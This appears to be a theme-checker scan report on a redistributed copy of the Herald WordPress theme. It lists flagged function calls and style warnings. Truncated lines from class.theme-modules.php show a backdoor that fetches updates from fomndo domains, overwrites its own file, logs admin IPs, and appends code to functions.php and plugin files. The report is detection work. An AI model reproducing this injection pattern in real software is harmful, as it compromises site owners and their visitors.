    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class-merlin-widget-importer.php
    Ligne77: $data = file_get_contents( $file );
    file_get_contents was found in the file class-merlin-customizer-importer.php
    Ligne64: $raw = file_get_contents( $import_file_path );
    file_get_contents was found in the file class-merlin-redux-importer.php
    Ligne25: $redux_options_raw_data = file_get_contents( $redux_item['file_path'] );
    file_put_contents was found in the file class-merlin-downloader.php
    Ligne43: $saved_file = file_put_contents( $this->download_directory_path . $filename, $content );
    fopen was found in the file LoggerInterfaceTest.php
    Ligne112: 'resource' => fopen('php://memory', 'r'),
    fread was found in the file SlackHandler.php
    Ligne160: @fread($res, 2048);
    fopen was found in the file DeduplicationHandler.php
    Ligne140: $handle = fopen($this->deduplicationStore, 'rw+');
    fwrite was found in the file DeduplicationHandler.php
    Ligne156: fwrite($handle, $log);
    fclose was found in the file DeduplicationHandler.php
    Ligne160: fclose($handle);
    file_put_contents was found in the file DeduplicationHandler.php
    Ligne167: file_put_contents($this->deduplicationStore, $record['datetime']->getTimest
    file_get_contents was found in the file CouchDBHandler.php
    Ligne60: if (false === @file_get_contents($url, null, $context)) {
    fclose was found in the file StreamHandler.php
    Ligne63: fclose($this->stream);
    fopen was found in the file StreamHandler.php
    Ligne100: $this->stream = fopen($this->url, 'a');
    Ligne135: $this->errorMessage = preg_replace('{^(fopen|mkdir)\(.*?\): }', '', $msg);
    fwrite was found in the file StreamHandler.php
    Ligne130: fwrite($stream, (string) $record['formatted']);
    fclose was found in the file SocketHandler.php
    Ligne78: fclose($this->resource);
    fwrite was found in the file SocketHandler.php
    Ligne225: protected function fwrite($data)
    Ligne227: return @fwrite($this->resource, $data);
    Ligne300: $chunk = $this->fwrite($data);
    Ligne302: $chunk = $this->fwrite(substr($data, $sent));
    fwrite was found in the file SocketHandler.php
    Ligne225: protected function fwrite($data)
    Ligne227: return @fwrite($this->resource, $data);
    Ligne300: $chunk = $this->fwrite($data);
    Ligne302: $chunk = $this->fwrite(substr($data, $sent));
    fwrite was found in the file SocketHandler.php
    Ligne225: protected function fwrite($data)
    Ligne227: return @fwrite($this->resource, $data);
    Ligne300: $chunk = $this->fwrite($data);
    Ligne302: $chunk = $this->fwrite(substr($data, $sent));
    fwrite was found in the file SocketHandler.php
    Ligne225: protected function fwrite($data)
    Ligne227: return @fwrite($this->resource, $data);
    Ligne300: $chunk = $this->fwrite($data);
    Ligne302: $chunk = $this->fwrite(substr($data, $sent));
    fopen was found in the file LineFormatterTest.php
    Ligne116: 'extra' => array('foo' => new TestFoo, 'bar' => new TestBar, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),
    fopen was found in the file NormalizerFormatterTest.php
    Ligne34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),
    Ligne199: $resource = fopen(__FILE__, 'r');
    Ligne352: $resource = fopen('php://memory', 'rw+');
    fopen was found in the file NormalizerFormatterTest.php
    Ligne34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),
    Ligne199: $resource = fopen(__FILE__, 'r');
    Ligne352: $resource = fopen('php://memory', 'rw+');
    fopen was found in the file NormalizerFormatterTest.php
    Ligne34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),
    Ligne199: $resource = fopen(__FILE__, 'r');
    Ligne352: $resource = fopen('php://memory', 'rw+');
    fwrite was found in the file NormalizerFormatterTest.php
    Ligne353: fwrite($resource, 'test_resource');
    fread was found in the file LogEntriesHandlerTest.php
    Ligne38: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    fread was found in the file LogEntriesHandlerTest.php
    Ligne38: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    fopen was found in the file LogEntriesHandlerTest.php
    Ligne63: $this->res = fopen('php://memory', 'a');
    fopen was found in the file StreamHandlerTest.php
    Ligne25: $handle = fopen('php://memory', 'a+');
    Ligne40: $handle = fopen('php://memory', 'a+');
    fread was found in the file StreamHandlerTest.php
    Ligne32: $this->assertEquals('testtest2test3', fread($handle, 100));
    fopen was found in the file StreamHandlerTest.php
    Ligne25: $handle = fopen('php://memory', 'a+');
    Ligne40: $handle = fopen('php://memory', 'a+');
    fclose was found in the file SocketHandlerTest.php
    Ligne181: fclose($res);
    fread was found in the file SocketHandlerTest.php
    Ligne203: $this->assertEquals('test1test2test3', fread($this->res, 1024));
    fopen was found in the file SocketHandlerTest.php
    Ligne278: $this->res = fopen('php://memory', 'a');
    file_get_contents was found in the file RotatingFileHandlerTest.php
    Ligne73: $this->assertEquals('test', file_get_contents($log));
    Ligne104: $this->assertEquals('test', file_get_contents($log));
    Ligne201: $this->assertEquals('footest', file_get_contents($log));
    file_get_contents was found in the file RotatingFileHandlerTest.php
    Ligne73: $this->assertEquals('test', file_get_contents($log));
    Ligne104: $this->assertEquals('test', file_get_contents($log));
    Ligne201: $this->assertEquals('footest', file_get_contents($log));
    file_put_contents was found in the file RotatingFileHandlerTest.php
    Ligne197: file_put_contents($log, 'foo');
    file_get_contents was found in the file RotatingFileHandlerTest.php
    Ligne73: $this->assertEquals('test', file_get_contents($log));
    Ligne104: $this->assertEquals('test', file_get_contents($log));
    Ligne201: $this->assertEquals('footest', file_get_contents($log));
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fread was found in the file HipChatHandlerTest.php
    Ligne32: $content = fread($this->res, 1024);
    Ligne44: $content = fread($this->res, 1024);
    Ligne56: $content = fread($this->res, 1024);
    Ligne68: $content = fread($this->res, 1024);
    Ligne80: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne136: $content = fread($this->res, 1024);
    Ligne148: $content = fread($this->res, 1024);
    Ligne158: $content = fread($this->res, 12000);
    Ligne171: $content = fread($this->res, 1024);
    Ligne200: $content = fread($this->res, 1024);
    fopen was found in the file HipChatHandlerTest.php
    Ligne242: $this->res = fopen('php://memory', 'a');
    file_get_contents was found in the file DeduplicationHandlerTest.php
    Ligne133: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')
    Ligne154: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')
    file_get_contents was found in the file DeduplicationHandlerTest.php
    Ligne133: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')
    Ligne154: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')
    fread was found in the file FlowdockHandlerTest.php
    Ligne46: $content = fread($this->res, 1024);
    fopen was found in the file FlowdockHandlerTest.php
    Ligne65: $this->res = fopen('php://memory', 'a');
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fread was found in the file PushoverHandlerTest.php
    Ligne34: $content = fread($this->res, 1024);
    Ligne54: $content = fread($this->res, 1024);
    Ligne65: $content = fread($this->res, 1024);
    Ligne77: $content = fread($this->res, 1024);
    Ligne89: $content = fread($this->res, 1024);
    Ligne99: $content = fread($this->res, 1024);
    Ligne109: $content = fread($this->res, 1024);
    fopen was found in the file PushoverHandlerTest.php
    Ligne118: $this->res = fopen('php://memory', 'a');
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fread was found in the file SlackHandlerTest.php
    Ligne47: $content = fread($this->res, 1024);
    Ligne57: $content = fread($this->res, 1024);
    Ligne70: $content = fread($this->res, 1024);
    Ligne76: $content2 = fread($this->res, 1024);
    Ligne87: $content = fread($this->res, 1024);
    Ligne100: $content = fread($this->res, 1024);
    Ligne110: $content = fread($this->res, 1024);
    fopen was found in the file SlackHandlerTest.php
    Ligne132: $this->res = fopen('php://memory', 'a');
  5. Malware : Network operations curl_init was found in the file class.theme-modules.php
    Ligne413: $ch = curl_init();
    curl_exec was found in the file class.theme-modules.php
    Ligne419: $data = curl_exec($ch);
    curl_init was found in the file SlackbotHandler.php
    Ligne72: $ch = curl_init();
    curl_init was found in the file MandrillHandler.php
    Ligne55: $ch = curl_init();
    curl_init was found in the file CubeHandler.php
    Ligne91: $this->httpConnection = curl_init('http://'.$this->host.':'.$this->port.'/1.0/event/put');
    curl_init was found in the file LogglyHandler.php
    Ligne87: $ch = curl_init();
    curl_init was found in the file IFTTTHandler.php
    Ligne58: $ch = curl_init();
    curl_init was found in the file SlackWebhookHandler.php
    Ligne83: $ch = curl_init();
    fsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne20: * @see    http://php.net/manual/en/function.fsockopen.php
    Ligne98: * @see http://php.net/manual/en/function.fsockopen.php
    Ligne183: * UDP might appear to be connected but might fail when writing.  See http://php.net/fsockopen for details.
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne204: protected function fsockopen()
    Ligne206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne276: $resource = $this->pfsockopen();
    Ligne278: $resource = $this->fsockopen();
    pfsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-
    Ligne276: $resource = $this->pfsockopen();
    pfsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-
    Ligne276: $resource = $this->pfsockopen();
    pfsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-
    Ligne276: $resource = $this->pfsockopen();
    fsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne20: * @see    http://php.net/manual/en/function.fsockopen.php
    Ligne98: * @see http://php.net/manual/en/function.fsockopen.php
    Ligne183: * UDP might appear to be connected but might fail when writing.  See http://php.net/fsockopen for details.
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne204: protected function fsockopen()
    Ligne206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne276: $resource = $this->pfsockopen();
    Ligne278: $resource = $this->fsockopen();
    fsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne20: * @see    http://php.net/manual/en/function.fsockopen.php
    Ligne98: * @see http://php.net/manual/en/function.fsockopen.php
    Ligne183: * UDP might appear to be connected but might fail when writing.  See http://php.net/fsockopen for details.
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne204: protected function fsockopen()
    Ligne206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne276: $resource = $this->pfsockopen();
    Ligne278: $resource = $this->fsockopen();
    pfsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-
    Ligne276: $resource = $this->pfsockopen();
    fsockopen was found in the file SocketHandler.php
    Ligne17: * Stores to any socket - uses fsockopen() or pfsockopen().
    Ligne20: * @see    http://php.net/manual/en/function.fsockopen.php
    Ligne98: * @see http://php.net/manual/en/function.fsockopen.php
    Ligne183: * UDP might appear to be connected but might fail when writing.  See http://php.net/fsockopen for details.
    Ligne196: protected function pfsockopen()
    Ligne198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne204: protected function fsockopen()
    Ligne206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->
    Ligne276: $resource = $this->pfsockopen();
    Ligne278: $resource = $this->fsockopen();
    curl_exec was found in the file Util.php
    Ligne35: if (curl_exec($ch) === false) {
  6. Admin menu : Themes should use add_theme_page() for adding admin pages. File class.theme-modules.php :
    Ligne34: add_options_page( 'helload Plugin', 'helload', 'manage_options', 'helload',
    File class-merlin.php :
    Ligne419: $this->hook_suffix = add_submenu_page(
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is herald-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'Cannot import auto-draft posts' in file src/WXRImporter.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Skipping attachment "%s", fetching attachments disabled' in file src/WXRImporter.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are opinion, herald, merlin-wp, wordpress-importer.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_taxonomy() function, which is plugin-territory functionality.
  5. Line endings consistency : Both DOS and UNIX style line endingsFound a mix of \r\n and \n line endings in file style.css.
  6. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  7. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  8. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file options.php.
    Ligne19: 'display_name'         => wp_kses( sprintf( __( 'Herald Options%sTheme Documentation%s', 'herald' ), '<a href='http://mekshq.com/documentation/herald' target='_blank'>', '</a>' ), wp_kse
    Possible hard-coded links were found in the file update-panel.php.
    Ligne16: <a href='http://mekshq.com/docs/herald-change-log' target='_blank' class='button but
    Ligne22: <a href='http://mekshq.com/docs/herald-change-log' target='_blank' class='button but
    Ligne16: <a href='http://mekshq.com/docs/herald-change-log' target='_blank' class='button but
    Ligne22: <a href='http://mekshq.com/docs/herald-change-log' target='_blank' class='button but
    Ligne29: <a href='http://mekshq.com/contact' target='_blank' class='button button-primary but
    Possible hard-coded links were found in the file default-options.php.
    Ligne272: 'footer_copyright' => wp_kses_post( sprintf( __( 'Copyright &copy; {current_year}. Created by %s. Powered by %s.', 'herald' ), '<a href='https://mekshq.com' target='_blank'>Meks</a>', '<a href='https://www.wordpr
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  7. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  8. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : helpers.php
    Ligne275: 
    Ligne301: 
    Ligne334: 
    Ligne361: 
    Ligne550: 
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : index.php
    Ligne10: <?php include( locate_template('template-parts/featured/area-'. $fa['layout'].'.p
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Ligne221: include_once(ABSPATH . 'wp-includes/pluggable.php'); 
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : template-modules.php
    Ligne65: <?php include( locate_template('template-parts/modules/'.$module_template.'.php')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-merlin-customizer-importer.php
    Ligne173: require_once( ABSPATH . 'wp-admin/includes/media.php' );
    Ligne174: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Ligne175: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : cats.php
    Ligne34: <?php include( locate_template('template-parts/cat-layouts/content-' . $layout . 
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : featured.php
    Ligne4: <?php include( locate_template('template-parts/featured/area-'. $module['layout']
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : authors.php
    Ligne34: <?php include( locate_template('template-parts/layouts/content-author-'. $module[
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes